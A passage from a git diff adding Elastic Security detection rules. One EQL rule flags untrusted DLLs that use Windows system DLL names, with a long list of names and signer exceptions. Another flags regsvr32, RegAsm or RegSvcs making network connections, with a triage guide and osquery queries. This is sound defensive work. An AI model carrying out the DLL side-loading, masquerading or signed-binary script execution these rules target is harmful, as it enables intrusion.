\"posyncservices.dll\", \"pots.dll\", \"powercpl.dll\", \"powrprof.dll\", \"ppcsnap.dll\", \"prauthproviders.dll\", \"prflbmsg.dll\", \"printui.dll\", \"printwsdahost.dll\", \"prm0009.dll\", \"prncache.dll\", \"prnfldr.dll\", \"prnntfy.dll\", \"prntvpt.dll\", \"profapi.dll\", \"profext.dll\", \"profprov.dll\", \"profsvc.dll\", \"profsvcext.dll\", \"propsys.dll\", \"provcore.dll\", \"provdatastore.dll\", \"provdiagnostics.dll\", \"provengine.dll\", \"provhandlers.dll\", \"provisioningcsp.dll\", \"provmigrate.dll\", \"provops.dll\", \"provplugineng.dll\", \"provsysprep.dll\", \"provthrd.dll\", \"proximitycommon.dll\", \"proximityservice.dll\", \"prvdmofcomp.dll\", \"psapi.dll\", \"pshed.dll\", \"psisdecd.dll\", \"psmsrv.dll\", \"pstask.dll\", \"pstorec.dll\", \"ptpprov.dll\", \"puiapi.dll\", \"puiobj.dll\", \"pushtoinstall.dll\", \"pwlauncher.dll\", \"pwrshplugin.dll\", \"pwsso.dll\", \"qasf.dll\", \"qcap.dll\", \"qdv.dll\", \"qdvd.dll\", \"qedit.dll\", \"qedwipes.dll\", \"qmgr.dll\", \"query.dll\", \"quiethours.dll\", \"qwave.dll\", \"racengn.dll\", \"racpldlg.dll\", \"radardt.dll\", \"radarrs.dll\", \"radcui.dll\", \"rasadhlp.dll\", \"rasapi32.dll\", \"rasauto.dll\", \"raschap.dll\", \"raschapext.dll\", \"rasctrs.dll\", \"rascustom.dll\", \"rasdiag.dll\", \"rasdlg.dll\", \"rasgcw.dll\", \"rasman.dll\", \"rasmans.dll\", \"rasmbmgr.dll\", \"rasmediamanager.dll\", \"rasmm.dll\", \"rasmontr.dll\", \"rasplap.dll\", \"rasppp.dll\", \"rastapi.dll\", \"rastls.dll\", \"rastlsext.dll\", \"rdbui.dll\", \"rdpbase.dll\", \"rdpcfgex.dll\", \"rdpcore.dll\", \"rdpcorets.dll\", \"rdpencom.dll\", \"rdpendp.dll\", \"rdpnano.dll\", \"rdpsaps.dll\", \"rdpserverbase.dll\", \"rdpsharercom.dll\", \"rdpudd.dll\", \"rdpviewerax.dll\", \"rdsappxhelper.dll\", \"rdsdwmdr.dll\", \"rdvvmtransport.dll\", \"rdxservice.dll\", \"rdxtaskfactory.dll\", \"reagent.dll\", \"reagenttask.dll\", \"recovery.dll\", \"regapi.dll\", \"regctrl.dll\", \"regidle.dll\", \"regsvc.dll\", \"reguwpapi.dll\", 
\"reinfo.dll\", \"remotepg.dll\", \"remotewipecsp.dll\", \"reportingcsp.dll\", \"resampledmo.dll\", \"resbparser.dll\", \"reseteng.dll\", \"resetengine.dll\", \"resetengonline.dll\", \"resourcemapper.dll\", \"resutils.dll\", \"rgb9rast.dll\", \"riched20.dll\", \"riched32.dll\", \"rjvmdmconfig.dll\", \"rmapi.dll\", \"rmclient.dll\", \"rnr20.dll\", \"roamingsecurity.dll\", \"rometadata.dll\", \"rotmgr.dll\", \"rpcepmap.dll\", \"rpchttp.dll\", \"rpcns4.dll\", \"rpcnsh.dll\", \"rpcrt4.dll\", \"rpcrtremote.dll\", \"rpcss.dll\", \"rsaenh.dll\", \"rshx32.dll\", \"rstrtmgr.dll\", \"rtffilt.dll\", \"rtm.dll\", \"rtmediaframe.dll\", \"rtmmvrortc.dll\", \"rtutils.dll\", \"rtworkq.dll\", \"rulebasedds.dll\", \"samcli.dll\", \"samlib.dll\", \"samsrv.dll\", \"sas.dll\", \"sbe.dll\", \"sbeio.dll\", \"sberes.dll\", \"sbservicetrigger.dll\", \"scansetting.dll\", \"scardbi.dll\", \"scarddlg.dll\", \"scardsvr.dll\", \"scavengeui.dll\", \"scdeviceenum.dll\", \"scecli.dll\", \"scesrv.dll\", \"schannel.dll\", \"schedcli.dll\", \"schedsvc.dll\", \"scksp.dll\", \"scripto.dll\", \"scrobj.dll\", \"scrptadm.dll\", \"scrrun.dll\", \"sdcpl.dll\", \"sdds.dll\", \"sdengin2.dll\", \"sdfhost.dll\", \"sdhcinst.dll\", \"sdiageng.dll\", \"sdiagprv.dll\", \"sdiagschd.dll\", \"sdohlp.dll\", \"sdrsvc.dll\", \"sdshext.dll\", \"searchfolder.dll\", \"sechost.dll\", \"seclogon.dll\", \"secproc.dll\", \"secproc_isv.dll\", \"secproc_ssp.dll\", \"secproc_ssp_isv.dll\", \"secur32.dll\", \"security.dll\", \"semgrps.dll\", \"semgrsvc.dll\", \"sendmail.dll\", \"sens.dll\", \"sensapi.dll\", \"sensorsapi.dll\", \"sensorscpl.dll\", \"sensorservice.dll\", \"sensorsnativeapi.dll\", \"sensorsutilsv2.dll\", \"sensrsvc.dll\", \"serialui.dll\", \"servicinguapi.dll\", \"serwvdrv.dll\", \"sessenv.dll\", \"setbcdlocale.dll\", \"settingmonitor.dll\", \"settingsync.dll\", \"settingsynccore.dll\", \"setupapi.dll\", \"setupcl.dll\", \"setupcln.dll\", \"setupetw.dll\", \"sfc.dll\", \"sfc_os.dll\", \"sgrmenclave.dll\", 
\"shacct.dll\", \"shacctprofile.dll\", \"sharedpccsp.dll\", \"sharedrealitysvc.dll\", \"sharehost.dll\", \"sharemediacpl.dll\", \"shcore.dll\", \"shdocvw.dll\", \"shell32.dll\", \"shellstyle.dll\", \"shfolder.dll\", \"shgina.dll\", \"shimeng.dll\", \"shimgvw.dll\", \"shlwapi.dll\", \"shpafact.dll\", \"shsetup.dll\", \"shsvcs.dll\", \"shunimpl.dll\", \"shutdownext.dll\", \"shutdownux.dll\", \"shwebsvc.dll\", \"signdrv.dll\", \"simauth.dll\", \"simcfg.dll\", \"skci.dll\", \"slc.dll\", \"slcext.dll\", \"slwga.dll\", \"smartscreenps.dll\", \"smbhelperclass.dll\", \"smbwmiv2.dll\", \"smiengine.dll\", \"smphost.dll\", \"smsroutersvc.dll\", \"sndvolsso.dll\", \"snmpapi.dll\", \"socialapis.dll\", \"softkbd.dll\", \"softpub.dll\", \"sortwindows61.dll\", \"sortwindows62.dll\", \"spacebridge.dll\", \"spacecontrol.dll\", \"spatializerapo.dll\", \"spatialstore.dll\", \"spbcd.dll\", \"speechpal.dll\", \"spfileq.dll\", \"spinf.dll\", \"spmpm.dll\", \"spnet.dll\", \"spoolss.dll\", \"spopk.dll\", \"spp.dll\", \"sppc.dll\", \"sppcext.dll\", \"sppcomapi.dll\", \"sppcommdlg.dll\", \"sppinst.dll\", \"sppnp.dll\", \"sppobjs.dll\", \"sppwinob.dll\", \"sppwmi.dll\", \"spwinsat.dll\", \"spwizeng.dll\", \"spwizimg.dll\", \"spwizres.dll\", \"spwmp.dll\", \"sqlsrv32.dll\", \"sqmapi.dll\", \"srchadmin.dll\", \"srclient.dll\", \"srcore.dll\", \"srevents.dll\", \"srh.dll\", \"srhelper.dll\", \"srm.dll\", \"srmclient.dll\", \"srmlib.dll\", \"srmscan.dll\", \"srmshell.dll\", \"srmstormod.dll\", \"srmtrace.dll\", \"srm_ps.dll\", \"srpapi.dll\", \"srrstr.dll\", \"srumapi.dll\", \"srumsvc.dll\", \"srvcli.dll\", \"srvsvc.dll\", \"srwmi.dll\", \"sscore.dll\", \"sscoreext.dll\", \"ssdm.dll\", \"ssdpapi.dll\", \"ssdpsrv.dll\", \"sspicli.dll\", \"sspisrv.dll\", \"ssshim.dll\", \"sstpsvc.dll\", \"starttiledata.dll\", \"startupscan.dll\", \"stclient.dll\", \"sti.dll\", \"sti_ci.dll\", \"stobject.dll\", \"storageusage.dll\", \"storagewmi.dll\", \"storewuauth.dll\", \"storprop.dll\", \"storsvc.dll\", 
\"streamci.dll\", \"structuredquery.dll\", \"sud.dll\", \"svf.dll\", \"svsvc.dll\", \"swprv.dll\", \"sxproxy.dll\", \"sxs.dll\", \"sxshared.dll\", \"sxssrv.dll\", \"sxsstore.dll\", \"synccenter.dll\", \"synccontroller.dll\", \"synchostps.dll\", \"syncproxy.dll\", \"syncreg.dll\", \"syncres.dll\", \"syncsettings.dll\", \"syncutil.dll\", \"sysclass.dll\", \"sysfxui.dll\", \"sysmain.dll\", \"sysntfy.dll\", \"syssetup.dll\", \"systemcpl.dll\", \"t2embed.dll\", \"tabbtn.dll\", \"tabbtnex.dll\", \"tabsvc.dll\", \"tapi3.dll\", \"tapi32.dll\", \"tapilua.dll\", \"tapimigplugin.dll\", \"tapiperf.dll\", \"tapisrv.dll\", \"tapisysprep.dll\", \"tapiui.dll\", \"taskapis.dll\", \"taskbarcpl.dll\", \"taskcomp.dll\", \"taskschd.dll\", \"taskschdps.dll\", \"tbauth.dll\", \"tbs.dll\", \"tcbloader.dll\", \"tcpipcfg.dll\", \"tcpmib.dll\", \"tcpmon.dll\", \"tcpmonui.dll\", \"tdh.dll\", \"tdlmigration.dll\", \"tellib.dll\", \"termmgr.dll\", \"termsrv.dll\", \"tetheringclient.dll\", \"tetheringmgr.dll\", \"tetheringservice.dll\", \"tetheringstation.dll\", \"textshaping.dll\", \"themecpl.dll\", \"themeservice.dll\", \"themeui.dll\", \"threadpoolwinrt.dll\", \"thumbcache.dll\", \"timebrokerclient.dll\", \"timebrokerserver.dll\", \"timesync.dll\", \"timesynctask.dll\", \"tlscsp.dll\", \"tokenbinding.dll\", \"tokenbroker.dll\", \"tokenbrokerui.dll\", \"tpmcertresources.dll\", \"tpmcompc.dll\", \"tpmtasks.dll\", \"tpmvsc.dll\", \"tquery.dll\", \"traffic.dll\", \"transportdsa.dll\", \"trie.dll\", \"trkwks.dll\", \"tsbyuv.dll\", \"tscfgwmi.dll\", \"tserrredir.dll\", \"tsf3gip.dll\", \"tsgqec.dll\", \"tsmf.dll\", \"tspkg.dll\", \"tspubwmi.dll\", \"tssessionux.dll\", \"tssrvlic.dll\", \"tsworkspace.dll\", \"ttdloader.dll\", \"ttdplm.dll\", \"ttdrecord.dll\", \"ttdrecordcpu.dll\", \"ttlsauth.dll\", \"ttlscfg.dll\", \"ttlsext.dll\", \"tvratings.dll\", \"twext.dll\", \"twinapi.dll\", \"twinui.dll\", \"txflog.dll\", \"txfw32.dll\", \"tzautoupdate.dll\", \"tzres.dll\", \"tzsyncres.dll\", \"ubpm.dll\", 
\"ucmhc.dll\", \"ucrtbase.dll\", \"ucrtbase_clr0400.dll\", \"ucrtbase_enclave.dll\", \"udhisapi.dll\", \"udwm.dll\", \"ueficsp.dll\", \"uexfat.dll\", \"ufat.dll\", \"uiamanager.dll\", \"uianimation.dll\", \"uiautomationcore.dll\", \"uicom.dll\", \"uireng.dll\", \"uiribbon.dll\", \"uiribbonres.dll\", \"ulib.dll\", \"umb.dll\", \"umdmxfrm.dll\", \"umpdc.dll\", \"umpnpmgr.dll\", \"umpo-overrides.dll\", \"umpo.dll\", \"umpoext.dll\", \"umpowmi.dll\", \"umrdp.dll\", \"unattend.dll\", \"unenrollhook.dll\", \"unimdmat.dll\", \"uniplat.dll\", \"unistore.dll\", \"untfs.dll\", \"updateagent.dll\", \"updatecsp.dll\", \"updatepolicy.dll\", \"upnp.dll\", \"upnphost.dll\", \"upshared.dll\", \"urefs.dll\", \"urefsv1.dll\", \"ureg.dll\", \"url.dll\", \"urlmon.dll\", \"usbcapi.dll\", \"usbceip.dll\", \"usbmon.dll\", \"usbperf.dll\", \"usbpmapi.dll\", \"usbtask.dll\", \"usbui.dll\", \"user32.dll\", \"usercpl.dll\", \"userdataservice.dll\", \"userdatatimeutil.dll\", \"userenv.dll\", \"userinitext.dll\", \"usermgr.dll\", \"usermgrcli.dll\", \"usermgrproxy.dll\", \"usoapi.dll\", \"usocoreps.dll\", \"usosvc.dll\", \"usp10.dll\", \"ustprov.dll\", \"utcutil.dll\", \"utildll.dll\", \"uudf.dll\", \"uvcmodel.dll\", \"uwfcfgmgmt.dll\", \"uwfcsp.dll\", \"uwfservicingapi.dll\", \"uxinit.dll\", \"uxlib.dll\", \"uxlibres.dll\", \"uxtheme.dll\", \"vac.dll\", \"van.dll\", \"vault.dll\", \"vaultcds.dll\", \"vaultcli.dll\", \"vaultroaming.dll\", \"vaultsvc.dll\", \"vbsapi.dll\", \"vbscript.dll\", \"vbssysprep.dll\", \"vcardparser.dll\", \"vdsbas.dll\", \"vdsdyn.dll\", \"vdsutil.dll\", \"vdsvd.dll\", \"vds_ps.dll\", \"verifier.dll\", \"version.dll\", \"vertdll.dll\", \"vfuprov.dll\", \"vfwwdm32.dll\", \"vhfum.dll\", \"vid.dll\", \"videohandlers.dll\", \"vidreszr.dll\", \"virtdisk.dll\", \"vmbuspipe.dll\", \"vmdevicehost.dll\", \"vmictimeprovider.dll\", \"vmrdvcore.dll\", \"voiprt.dll\", \"vpnike.dll\", \"vpnikeapi.dll\", \"vpnsohdesktop.dll\", \"vpnv2csp.dll\", \"vscmgrps.dll\", \"vssapi.dll\", 
\"vsstrace.dll\", \"vss_ps.dll\", \"w32time.dll\", \"w32topl.dll\", \"waasassessment.dll\", \"waasmediccapsule.dll\", \"waasmedicps.dll\", \"waasmedicsvc.dll\", \"wabsyncprovider.dll\", \"walletproxy.dll\", \"walletservice.dll\", \"wavemsp.dll\", \"wbemcomn.dll\", \"wbiosrvc.dll\", \"wci.dll\", \"wcimage.dll\", \"wcmapi.dll\", \"wcmcsp.dll\", \"wcmsvc.dll\", \"wcnapi.dll\", \"wcncsvc.dll\", \"wcneapauthproxy.dll\", \"wcneappeerproxy.dll\", \"wcnnetsh.dll\", \"wcnwiz.dll\", \"wc_storage.dll\", \"wdc.dll\", \"wdi.dll\", \"wdigest.dll\", \"wdscore.dll\", \"webauthn.dll\", \"webcamui.dll\", \"webcheck.dll\", \"webclnt.dll\", \"webio.dll\", \"webservices.dll\", \"websocket.dll\", \"wecapi.dll\", \"wecsvc.dll\", \"wephostsvc.dll\", \"wer.dll\", \"werconcpl.dll\", \"wercplsupport.dll\", \"werenc.dll\", \"weretw.dll\", \"wersvc.dll\", \"werui.dll\", \"wevtapi.dll\", \"wevtfwd.dll\", \"wevtsvc.dll\", \"wfapigp.dll\", \"wfdprov.dll\", \"wfdsconmgr.dll\", \"wfdsconmgrsvc.dll\", \"wfhc.dll\", \"whealogr.dll\", \"whhelper.dll\", \"wiaaut.dll\", \"wiadefui.dll\", \"wiadss.dll\", \"wiarpc.dll\", \"wiascanprofiles.dll\", \"wiaservc.dll\", \"wiashext.dll\", \"wiatrace.dll\", \"wificloudstore.dll\", \"wificonfigsp.dll\", \"wifidisplay.dll\", \"wimgapi.dll\", \"win32spl.dll\", \"win32u.dll\", \"winbio.dll\", \"winbiodatamodel.dll\", \"winbioext.dll\", \"winbrand.dll\", \"wincorlib.dll\", \"wincredprovider.dll\", \"wincredui.dll\", \"windowmanagement.dll\", \"windowscodecs.dll\", \"windowscodecsext.dll\", \"windowscodecsraw.dll\", \"windowsiotcsp.dll\", \"windowslivelogin.dll\", \"winethc.dll\", \"winhttp.dll\", \"winhttpcom.dll\", \"winhvemulation.dll\", \"winhvplatform.dll\", \"wininet.dll\", \"wininetlui.dll\", \"wininitext.dll\", \"winipcfile.dll\", \"winipcsecproc.dll\", \"winipsec.dll\", \"winlangdb.dll\", \"winlogonext.dll\", \"winmde.dll\", \"winml.dll\", \"winmm.dll\", \"winmmbase.dll\", \"winmsipc.dll\", \"winnlsres.dll\", \"winnsi.dll\", \"winreagent.dll\", \"winrnr.dll\", 
\"winrscmd.dll\", \"winrsmgr.dll\", \"winrssrv.dll\", \"winrttracing.dll\", \"winsatapi.dll\", \"winscard.dll\", \"winsetupui.dll\", \"winshfhc.dll\", \"winsku.dll\", \"winsockhc.dll\", \"winsqlite3.dll\", \"winsrpc.dll\", \"winsrv.dll\", \"winsrvext.dll\", \"winsta.dll\", \"winsync.dll\", \"winsyncmetastore.dll\", \"winsyncproviders.dll\", \"wintrust.dll\", \"wintypes.dll\", \"winusb.dll\", \"wirednetworkcsp.dll\", \"wisp.dll\", \"wkscli.dll\", \"wkspbrokerax.dll\", \"wksprtps.dll\", \"wkssvc.dll\", \"wlanapi.dll\", \"wlancfg.dll\", \"wlanconn.dll\", \"wlandlg.dll\", \"wlangpui.dll\", \"wlanhc.dll\", \"wlanhlp.dll\", \"wlanmediamanager.dll\", \"wlanmm.dll\", \"wlanmsm.dll\", \"wlanpref.dll\", \"wlanradiomanager.dll\", \"wlansec.dll\", \"wlansvc.dll\", \"wlansvcpal.dll\", \"wlanui.dll\", \"wlanutil.dll\", \"wldap32.dll\", \"wldp.dll\", \"wlgpclnt.dll\", \"wlidcli.dll\", \"wlidcredprov.dll\", \"wlidfdp.dll\", \"wlidnsp.dll\", \"wlidprov.dll\", \"wlidres.dll\", \"wlidsvc.dll\", \"wmadmod.dll\", \"wmadmoe.dll\", \"wmalfxgfxdsp.dll\", \"wmasf.dll\", \"wmcodecdspps.dll\", \"wmdmlog.dll\", \"wmdmps.dll\", \"wmdrmsdk.dll\", \"wmerror.dll\", \"wmi.dll\", \"wmiclnt.dll\", \"wmicmiplugin.dll\", \"wmidcom.dll\", \"wmidx.dll\", \"wmiprop.dll\", \"wmitomi.dll\", \"wmnetmgr.dll\", \"wmp.dll\", \"wmpdui.dll\", \"wmpdxm.dll\", \"wmpeffects.dll\", \"wmphoto.dll\", \"wmploc.dll\", \"wmpps.dll\", \"wmpshell.dll\", \"wmsgapi.dll\", \"wmspdmod.dll\", \"wmspdmoe.dll\", \"wmvcore.dll\", \"wmvdecod.dll\", \"wmvdspa.dll\", \"wmvencod.dll\", \"wmvsdecd.dll\", \"wmvsencd.dll\", \"wmvxencd.dll\", \"woftasks.dll\", \"wofutil.dll\", \"wordbreakers.dll\", \"workfoldersgpext.dll\", \"workfoldersres.dll\", \"workfoldersshell.dll\", \"workfolderssvc.dll\", \"wosc.dll\", \"wow64.dll\", \"wow64cpu.dll\", \"wow64win.dll\", \"wpbcreds.dll\", \"wpc.dll\", \"wpcapi.dll\", \"wpcdesktopmonsvc.dll\", \"wpcproxystubs.dll\", \"wpcrefreshtask.dll\", \"wpcwebfilter.dll\", \"wpdbusenum.dll\", \"wpdshext.dll\", 
\"wpdshserviceobj.dll\", \"wpdsp.dll\", \"wpd_ci.dll\", \"wpnapps.dll\", \"wpnclient.dll\", \"wpncore.dll\", \"wpninprc.dll\", \"wpnprv.dll\", \"wpnservice.dll\", \"wpnsruprov.dll\", \"wpnuserservice.dll\", \"wpportinglibrary.dll\", \"wpprecorderum.dll\", \"wptaskscheduler.dll\", \"wpx.dll\", \"ws2help.dll\", \"ws2_32.dll\", \"wscapi.dll\", \"wscinterop.dll\", \"wscisvif.dll\", \"wsclient.dll\", \"wscproxystub.dll\", \"wscsvc.dll\", \"wsdapi.dll\", \"wsdchngr.dll\", \"wsdprintproxy.dll\", \"wsdproviderutil.dll\", \"wsdscanproxy.dll\", \"wsecedit.dll\", \"wsepno.dll\", \"wshbth.dll\", \"wshcon.dll\", \"wshelper.dll\", \"wshext.dll\", \"wshhyperv.dll\", \"wship6.dll\", \"wshqos.dll\", \"wshrm.dll\", \"wshtcpip.dll\", \"wshunix.dll\", \"wslapi.dll\", \"wsmagent.dll\", \"wsmauto.dll\", \"wsmplpxy.dll\", \"wsmres.dll\", \"wsmsvc.dll\", \"wsmwmipl.dll\", \"wsnmp32.dll\", \"wsock32.dll\", \"wsplib.dll\", \"wsp_fs.dll\", \"wsp_health.dll\", \"wsp_sr.dll\", \"wtsapi32.dll\", \"wuapi.dll\", \"wuaueng.dll\", \"wuceffects.dll\", \"wudfcoinstaller.dll\", \"wudfplatform.dll\", \"wudfsmcclassext.dll\", \"wudfx.dll\", \"wudfx02000.dll\", \"wudriver.dll\", \"wups.dll\", \"wups2.dll\", \"wuuhext.dll\", \"wuuhosdeployment.dll\", \"wvc.dll\", \"wwaapi.dll\", \"wwaext.dll\", \"wwanapi.dll\", \"wwancfg.dll\", \"wwanhc.dll\", \"wwanprotdim.dll\", \"wwanradiomanager.dll\", \"wwansvc.dll\", \"wwapi.dll\", \"xamltilerender.dll\", \"xaudio2_8.dll\", \"xaudio2_9.dll\", \"xblauthmanager.dll\", \"xblgamesave.dll\", \"xblgamesaveext.dll\", \"xblgamesaveproxy.dll\", \"xboxgipsvc.dll\", \"xboxgipsynthetic.dll\", \"xboxnetapisvc.dll\", \"xinput1_4.dll\", \"xinput9_1_0.dll\", \"xinputuap.dll\", \"xmlfilter.dll\", \"xmllite.dll\", \"xmlprovi.dll\", \"xolehlp.dll\", \"xpsgdiconverter.dll\", \"xpsprint.dll\", \"xpspushlayer.dll\", \"xpsrasterservice.dll\", \"xpsservices.dll\", \"xwizards.dll\", \"xwreg.dll\", \"xwtpdui.dll\", \"xwtpw32.dll\", \"zipcontainer.dll\", \"zipfldr.dll\", \"bootsvc.dll\", 
\"halextintcpsedma.dll\", \"icsvcvss.dll\", \"ieproxydesktop.dll\", \"lsaadt.dll\", \"nlansp_c.dll\", \"nrtapi.dll\", \"opencl.dll\", \"pfclient.dll\", \"pnpdiag.dll\", \"prxyqry.dll\", \"rdpnanotransport.dll\", \"servicingcommon.dll\", \"sortwindows63.dll\", \"sstpcfg.dll\", \"tdhres.dll\", \"umpodev.dll\", \"utcapi.dll\", \"windlp.dll\", \"wow64base.dll\", \"wow64con.dll\", \"blbuires.dll\", \"bpainst.dll\", \"cbclient.dll\", \"certadm.dll\", \"certocm.dll\", \"certpick.dll\", \"csdeployres.dll\", \"dsdeployres.dll\", \"eapa3hst.dll\", \"eapacfg.dll\", \"eapahost.dll\", \"elsext.dll\", \"encdump.dll\", \"escmigplugin.dll\", \"fsclient.dll\", \"fsdeployres.dll\", \"fssminst.dll\", \"fssmres.dll\", \"fssprov.dll\", \"ipamapi.dll\", \"kpssvc.dll\", \"lbfoadminlib.dll\", \"mintdh.dll\", \"mmci.dll\", \"mmcico.dll\", \"mprsnap.dll\", \"mstsmhst.dll\", \"mstsmmc.dll\", \"muxinst.dll\", \"personax.dll\", \"rassfm.dll\", \"rasuser.dll\", \"rdmsinst.dll\", \"rdmsres.dll\", \"rtrfiltr.dll\", \"sacsvr.dll\", \"scrdenrl.dll\", \"sdclient.dll\", \"sharedstartmodel.dll\", \"smsrouter.dll\", \"spwizimg_svr.dll\", \"sqlcecompact40.dll\", \"sqlceoledb40.dll\", \"sqlceqp40.dll\", \"sqlcese40.dll\", \"srvmgrinst.dll\", \"svrmgrnc.dll\", \"tapisnap.dll\", \"tlsbrand.dll\", \"tsec.dll\", \"tsprop.dll\", \"tspubiconhelper.dll\", \"tssdjet.dll\", \"tsuserex.dll\", \"ualapi.dll\", \"ualsvc.dll\", \"umcres.dll\", \"updatehandlers.dll\", \"usocore.dll\", \"vssui.dll\", \"wsbappres.dll\", \"wsbonline.dll\", \"wsmselpl.dll\", \"wsmselrr.dll\", \"xpsfilt.dll\", \"xpsshhdr.dll\"\n ) and\n not (\n (\n dll.name : \"icuuc.dll\" and dll.code_signature.subject_name in (\n \"Valve\", \"Valve Corp.\", \"Avanquest Software (7270356 Canada Inc)\", \"Adobe Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : (\"timeSync.dll\", \"appInfo.dll\") and dll.code_signature.subject_name in (\n \"VMware Inc.\", \"VMware, Inc.\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n 
dll.name : \"libcrypto.dll\" and dll.code_signature.subject_name in (\n \"NoMachine S.a.r.l.\", \"Oculus VR, LLC\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : \"ucrtbase.dll\" and dll.code_signature.subject_name in (\n \"Proofpoint, Inc.\", \"Rapid7 LLC\", \"Eclipse.org Foundation, Inc.\", \"Amazon.com Services LLC\", \"Windows Phone\"\n ) and dll.code_signature.trusted == true\n ) or\n (\n dll.name : (\"libcrypto.dll\", \"wmi.dll\", \"geolocation.dll\", \"kerberos.dll\") and\n dll.code_signature.subject_name == \"Bitdefender SRL\" and dll.code_signature.trusted == true\n ) or\n (dll.name : \"ICMP.dll\" and dll.code_signature.subject_name == \"Paessler AG\" and dll.code_signature.trusted == true) or\n (dll.name : \"dbghelp.dll\" and dll.code_signature.trusted == true) or\n (dll.name : \"DirectML.dll\" and dll.code_signature.subject_name == \"Adobe Inc.\" and dll.code_signature.trusted == true) or\n (\n dll.path : (\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\dxgi.dll\",\n \"?:\\\\Windows\\\\SystemApps\\\\*\\\\wincorlib.dll\",\n \"?:\\\\Windows\\\\dxgi.dll\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "dll.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "fb01d790-9f74-4e76-97dd-b4b0f7bf6435", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: 
Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.001", + "name": "DLL Search Order Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/001/" + }, + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 103 + }, + "id": "fb01d790-9f74-4e76-97dd-b4b0f7bf6435_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_107.json b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_107.json new file mode 100644 index 00000000000..19fb6ac761d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fb02b8d3-71ee-4af1-bacd-215d23f17efa_107.json 
@@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the native Windows tools regsvr32.exe, regsvr64.exe, RegSvcs.exe, or RegAsm.exe making a network connection. This may be indicative of an attacker bypassing allowlists or running arbitrary scripts via a signed Microsoft binary.", + "false_positives": [ + "Security testing may produce events like this. Activity of this kind performed by non-engineers and ordinary users is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Registration Utility", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Registration Utility\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity such as masquerading, and deserve further investigation.\n\nThis rule looks for the execution of `regsvr32.exe`, `RegAsm.exe`, or `RegSvcs.exe` utilities followed by a network connection to an external address. Attackers can abuse utilities to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services 